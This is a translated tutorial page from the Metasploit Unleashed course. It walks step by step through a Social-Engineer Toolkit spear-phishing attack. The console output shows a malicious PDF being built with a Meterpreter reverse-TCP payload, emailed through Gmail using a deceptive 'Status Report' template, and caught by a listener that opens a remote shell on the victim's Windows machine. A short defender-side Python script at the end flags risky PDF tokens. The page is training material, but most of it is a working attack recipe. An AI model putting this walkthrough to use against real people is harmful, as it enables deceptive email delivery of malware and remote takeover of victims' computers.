Spear-Phishing Attack

From www.metasploit-es.com.ar

Spear-Phishing Attack Vector

As mentioned previously, the spear-phishing attack vector can be used to send targeted emails with malicious attachments. In this example we will carry out an attack, integrate it with Gmail and send a malicious PDF to the victim. Note that you can create and save your own templates for use in future SE attacks, or use the pre-built ones. Also note that when using SET, pressing Enter accepts the defaults: port 443 is always used for the reverse connection, together with a reverse Meterpreter payload.

  Select from the menu:
  1.  Spear-Phishing Attack Vectors
  2.  Website Attack Vectors
  3.  Infectious Media Generator
  4.  Create a Payload and Listener
  5.  Mass Mailer Attack
  6.  Teensy USB HID Attack Vector
  7.  SMS Spoofing Attack Vector
  8.  Third Party Modules
  9.  Update the Metasploit Framework
  10. Update the Social-Engineer Toolkit
  11. Help, Credits, and About
  12. Exit the Social-Engineer Toolkit
  Enter your choice: 1
  Welcome to the SET E-Mail attack method. This module allows you
  to specially craft email messages and send them to a large (or small)
  number of people with attached fileformat malicious payloads. If you
  want to spoof your email address, be sure "Sendmail" is installed (it
  is installed in BT) and change the config/set_config SENDMAIL=OFF flag
  to SENDMAIL=ON.
  There are two options, one is getting your feet wet and letting SET do
  everything for you (option 1), the second is to create your own FileFormat
  payload and use it in your own attack. Either way, good luck and enjoy!
  1. Perform a Mass Email Attack
  2. Create a FileFormat Payload
  3. Create a Social-Engineering Template
  4. Return to Main Menu
  Enter your choice: 1
  Select the file format exploit you want.
  The default is the PDF embedded EXE.
       ********** PAYLOADS **********
  1. SET Custom Written DLL Hijacking Attack Vector (RAR, ZIP)
  2. Adobe Flash Player 'Button' Remote Code Execution
  3. Adobe CoolType SING Table 'uniqueName' Overflow
  4. Adobe Flash Player 'newfunction' Invalid Pointer Use
  5. Adobe Collab.collectEmailInfo Buffer Overflow
  6. Adobe Collab.getIcon Buffer Overflow
  7. Adobe JBIG2Decode Memory Corruption Exploit
  8. Adobe PDF Embedded EXE Social Engineering
  9. Adobe util.printf() Buffer Overflow
  10. Custom EXE to VBA (sent via RAR) (RAR required)
  11. Adobe U3D CLODProgressiveMeshDeclaration Array Overrun
  12. Adobe PDF Embedded EXE Social Engineering (NOJS)
  Enter the number you want (press enter for default): 1
  1. Windows Reverse TCP Shell
  2. Windows Meterpreter Reverse_TCP
  3. Windows Reverse VNC
  4. Windows Reverse TCP Shell (x64)
  5. Windows Meterpreter Reverse_TCP (X64)
  6. Windows Shell Bind_TCP (X64)
  Enter the payload you want (press enter for default):
  [*] Windows Meterpreter Reverse TCP selected.
  Enter the port to connect back on (press enter for default):
  [*] Defaulting to port 443...
  [*] Generating fileformat exploit...
  [*] Please wait while we load the module tree...
  [*] Started reverse handler on 172.16.32.129:443
  [*] Creating 'template.pdf' file...
  [*] Generated output file /pentest/exploits/set/src/program_junk/template.pdf
  [*] Payload creation complete.
  [*] All payloads get sent to the src/msf_attacks/template.pdf directory
  [*] Payload generation complete. Press enter to continue.
  As an added bonus, use the file-format creator in SET to create your attachment.
  Right now the attachment will be imported with filename of 'template.whatever'
  Do you want to rename the file?
  example Enter the new filename: moo.pdf
  1. Keep the filename, I don't care.
  2. Rename the file, I want to be cool.
  Enter your choice (enter for default): 1
  Keeping the filename and moving on.
  Social Engineer Toolkit Mass E-Mailer
  There are two options on the mass e-mailer, the first would
  be to send an email to one individual person. The second option
  will allow you to import a list and send it to as many people as
  you want within that list.
  What do you want to do:
  1. E-Mail Attack Single Email Address
  2. E-Mail Attack Mass Mailer
  3. Return to main menu.
  Enter your choice: 1
  Do you want to use a predefined template or craft
  a one time email template.
  1. Pre-Defined Template
  2. One-Time Use Email Template
  Enter your choice: 1
  Below is a list of available templates:
  1: Baby Pics
  2: Strange internet usage from your computer
  3: New Update
  4: LOL...have to check this out...
  5: Dan Brown's Angels & Demons
  6: Computer Issue
  7: Status Report
  Enter the number you want to use: 7
  Enter who you want to send email to: kennedyd013@gmail.com
  What option do you want to use?
  1. Use a GMAIL Account for your email attack.
  2. Use your own server or open relay
  Enter your choice: 1
  Enter your GMAIL email address: kennedyd013@gmail.com
  Enter your password for gmail (it will not be displayed back to you):
  SET has finished delivering the emails.
  Do you want to setup a listener yes or no: yes
  [-] ***
  [-] * WARNING: No database support: String User Disabled Database Support
  [-] ***
                   |                    |      _) |
   __ `__ \   _ \ __|  _` |  __| __ \  |  _ \  | __|
   |   |   |  __/ |   (   |\__ \ |   | | (   | | |
  _|  _|  _|\___|\__|\__,_|____/ .__/ _|\___/ _|\__|
                                _|
          =[ metasploit v3.4.2-dev [core:3.4 api:1.0]
   + -- --=[ 588 exploits - 300 auxiliary
   + -- --=[ 224 payloads - 27 encoders - 8 nops
          =[ svn r10268 updated today (2010.09.09)
  resource (src/program_junk/meta_config)> use exploit/multi/handler
  resource (src/program_junk/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp
  PAYLOAD => windows/meterpreter/reverse_tcp
  resource (src/program_junk/meta_config)> set LHOST 172.16.32.129
  LHOST => 172.16.32.129
  resource (src/program_junk/meta_config)> set LPORT 443
  LPORT => 443
  resource (src/program_junk/meta_config)> set ENCODING shikata_ga_nai
  ENCODING => shikata_ga_nai
  resource (src/program_junk/meta_config)> set ExitOnSession false
  ExitOnSession => false
  resource (src/program_junk/meta_config)> exploit -j
  [*] Exploit running as background job.
  msf exploit(handler) >
  [*] Started reverse handler on 172.16.32.129:443
  [*] Starting the payload handler...
  msf exploit(handler) >
  

Once the whole attack has been configured, the victim opens the email and the PDF:

[Image: SET 01.png]

As soon as the victim opens the attachment, a shell is presented back to us:

  [*] Sending stage (748544 bytes) to 172.16.32.131
  [*] Meterpreter session 1 opened (172.16.32.129:443 -> 172.16.32.131:1139) at Thu Sep 09 09:58:06 -0400 2010
  msf exploit(handler) > sessions -i 1
  [*] Starting interaction with 1...
  meterpreter > shell
  Process 3940 created.
  Channel 1 created.
  Microsoft Windows XP [Version 5.1.2600]
  (C) Copyright 1985-2001 Microsoft Corp.
  C:\Documents and Settings\Administrator\Desktop>

The spear-phishing attack can be sent to multiple people or to individuals, integrates with Google Mail and can be fully customized to your needs for the attack vector. Overall it is very effective for spear-phishing by email.
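The attachment produced by this walkthrough is a PDF whose embedded executable is wired up through the document's own action and file-attachment objects, so a mail gateway or a triage script can flag such a file by the name tokens it carries before a user ever opens it. The script below is an added, defender-side example that is not part of the original page or of SET; the sample PDF in it is constructed, contains no payload, and only mimics those structural markers, and the `#xx` hex-escape handling covers a spec-allowed encoding of names that naive string matching misses.

```python
import re

# Constructed sample: a minimal, non-functional PDF skeleton that carries the
# markers an auto-launching embedded-file attachment leaves behind.
SAMPLE_PDF = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R >> endobj
4 0 obj << /S /Launch /F (template.exe) >> endobj
5 0 obj << /Type /Filespec /F (template.exe) /EF << /F 6 0 R >> >> endobj
6 0 obj << /Type /#45mbedded#46ile /Length 0 >> stream
endstream endobj
trailer << /Root 1 0 R >>
%%EOF
"""

# PDF name tokens that warrant manual review of an e-mailed attachment.
RISKY_NAMES = ("/OpenAction", "/AA", "/Launch", "/JavaScript", "/JS",
               "/EmbeddedFile", "/RichMedia", "/ObjStm")

def decode_names(data: bytes) -> bytes:
    """Undo #xx hex escapes inside PDF name tokens (e.g. /#4Aava#53cript),
    a spec-allowed encoding that hides keywords from plain string matching."""
    return re.sub(rb"#([0-9A-Fa-f]{2})",
                  lambda m: bytes([int(m.group(1).decode(), 16)]), data)

def scan_pdf(data: bytes) -> dict:
    """Return {name: count} for every risky name token present in the file."""
    text = decode_names(data)
    hits = {}
    for name in RISKY_NAMES:
        # Require a delimiter after the name so /JS does not also match /JSx.
        pattern = re.escape(name.encode()) + rb"(?![A-Za-z0-9])"
        count = len(re.findall(pattern, text))
        if count:
            hits[name] = count
    return hits

def verdict(hits: dict) -> str:
    """An auto-run action combined with a launch, script or embedded file is
    the pattern behind the embedded-EXE attachment; anything else is reviewed."""
    auto_run = "/OpenAction" in hits or "/AA" in hits
    carrier = any(k in hits for k in ("/Launch", "/EmbeddedFile", "/JavaScript", "/JS"))
    if auto_run and carrier:
        return "quarantine"
    return "review" if hits else "clean"
```

Run `verdict(scan_pdf(open(path, "rb").read()))` over quarantined attachments; a "quarantine" result on an externally received PDF is a strong triage signal, while "review" only means the file uses features worth a closer look.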



© Offensive Security 2009

Original from www.offensive-security.com
Translated by cbk999